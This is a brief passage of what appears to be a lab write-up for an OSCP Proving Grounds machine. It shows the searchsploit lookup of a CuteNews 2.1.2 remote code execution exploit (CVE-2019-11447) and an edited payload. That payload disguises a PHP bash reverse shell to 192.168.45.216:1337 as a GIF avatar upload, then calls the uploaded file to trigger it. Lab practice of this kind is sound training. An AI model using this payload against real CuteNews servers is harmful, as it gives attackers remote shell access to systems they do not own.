Foothold

adot@pwnbox:~/oscp/provinggrounds/easy/bbscute$ searchsploit -m 48800
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
    Codes: CVE-2019-11447
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/adot/oscp/provinggrounds/easy/bbscute/48800.py

payload = f'''GIF89a;\n<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.216/1337 0>&1'");?>'''.encode()

payload_send = sess.post(f"{ip}/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    os.system("curl " + (f"{ip}/uploads/avatar_{logged_user}_{logged_user}.php"))